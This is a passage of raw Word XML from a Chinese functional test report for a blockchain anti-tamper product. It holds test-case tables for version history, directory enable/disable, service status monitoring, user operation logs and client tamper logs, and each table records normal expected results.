                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4193540" cy="933450"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A26DC0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看历史版本</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23593FB6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="190CADE1" wp14:editId="1677578C">
                  <wp:extent cx="4195445" cy="3826510"/>
                  <wp:effectExtent l="0" t="0" r="20955" b="8890"/>
                  <wp:docPr id="5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63"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4195445" cy="3826510"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="31EDDE3E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>停用、启用目录</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D73C20D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="7B666248" wp14:editId="21D56EDA">
                  <wp:extent cx="4191000" cy="1153795"/>
                  <wp:effectExtent l="0" t="0" r="0" b="14605"/>
                  <wp:docPr id="5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64"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4191000" cy="1153795"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="04AA8DAB" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5E002F07"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481910E9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看历史版本，停用、启用目录成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="37967F92" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1E09967D"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70DF0A2E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23A8DD6E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="329" w:name="_Toc201835704"/>
      <w:bookmarkStart w:id="330" w:name="_Toc517288751"/>
      <w:bookmarkStart w:id="331" w:name="_Toc3552452"/>
      <w:bookmarkStart w:id="332" w:name="_Toc501754576"/>
      <w:bookmarkStart w:id="333" w:name="_Toc36487946"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>防篡改状态监视模块</w:t>
      </w:r>
      <w:bookmarkEnd w:id="329"/>
      <w:bookmarkEnd w:id="330"/>
      <w:bookmarkEnd w:id="331"/>
      <w:bookmarkEnd w:id="332"/>
      <w:bookmarkEnd w:id="333"/>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4E7A77C7" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20439330"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5B726430" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>防篡改状态监视模块</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0B00024C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B51EE2D"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212B08DE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0E9478B1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A64C254"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267FC425"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1B0934B6" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70E6C915"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60BD1FF7" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>查看目标</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rStyle w:val="8lab-Char0"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>主机上的防篡改服务状态，运行状态包括正常和心跳超时等。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="528031F4"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114300" distR="114300" wp14:anchorId="140A5D11" wp14:editId="6CA10DAB">
                  <wp:extent cx="4192270" cy="2181860"/>
                  <wp:effectExtent l="0" t="0" r="24130" b="2540"/>
                  <wp:docPr id="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65"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4192270" cy="2181860"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="150CD181" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B37E024"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399E9D7F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="59B49D8B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27CDF677"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2374FA57" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="010CB158" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="334" w:name="_Toc36487947"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用户操作日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33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66B0FB85" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5EFC3A42"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0D53E626" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户操作日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="64D4B24F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EAE149B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67593860" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2017DB45" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EC96F11"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20B6CE5F"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34F4AA0B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E43A7DA"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148B4278" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>防篡改服务的操作日志查看功能。主要包含用户的启动/暂停根目录保护，新增、删除、移动和重命名等操作记录。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D81BB2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799657AC" wp14:editId="17AE59BF">
                  <wp:extent cx="5278120" cy="2480310"/>
                  <wp:effectExtent l="0" t="0" r="5080" b="889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6"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5278120" cy="2480310"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1AE05453" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="292C45A8"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227919D2"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Style w:val="8lab-Char0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7D816459" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B0FAF1F"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13BE103B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="67F39E05" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="335" w:name="_Toc36487948"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端防篡改日志</w:t>
      </w:r>
      <w:bookmarkEnd w:id="335"/>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0F4D466B" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0802110B"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525483B3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>客户端防篡改日志</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="47D1A5D4" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="229328ED"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0295CC77" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面测试、接口数据测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="780D0678" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50D3A37D"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6233CB59" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>区块链防篡改功能相关组件全部开启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="346948EC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26BE3470"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69EE767D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>查看</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>目标主机上被保护目录的篡改操作。监控的篡改包括新增、删除、修改和移动目录或文件的4类篡改操作。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C449663" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>该模块提供了对用户通过八分量SVN区块链服务的操作日志查看功能。主要包含用户的启动/暂停SVN数据仓库保护，恢复SVN数据仓库版本，以及客户端自动同步的操作记录。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E4A5344" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-b"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="57C8F478" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="461F4AE5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3988FFC5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>界面显示正常，接口数据正常。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="0D4141EC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53577982"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5DDD48DE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B8AA2F9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="336" w:name="_Toc36487949"/>
      <w:r w:rsidRPr="00536672">
        <w:t>用户管理</w:t>
      </w:r>
      <w:bookmarkEnd w:id="336"/>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67C7D43D" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
